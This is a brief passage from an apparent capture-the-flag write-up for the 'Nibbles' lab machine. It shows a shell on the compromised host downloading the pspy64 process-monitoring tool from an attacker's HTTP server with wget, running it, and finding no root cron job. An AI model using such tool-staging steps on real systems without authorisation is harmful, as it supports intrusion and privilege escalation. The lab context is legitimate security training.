PSPY
nibbler@nibbles:/tmp$ wget http://10.10.14.6:8000/pspy/pspy64
wget http://10.10.14.6:8000/pspy/pspy64
--2023-01-13 23:24:25-- http://10.10.14.6:8000/pspy/pspy64
connecting to 10.10.14.6:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 3078592 (2.9M) [application/octet-stream]
saving to: 'pspy64'
pspy64 100%[===================>] 2.94M 1.27MB/s in 2.3s
2023-01-13 23:24:27 (1.27 MB/s) - 'pspy64' saved [3078592/3078592]
Delivery
nibbler@nibbles:/tmp$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
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config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
I want to see what the cronjob does
It’s been awhile and I don’t think there is any cronjob made by root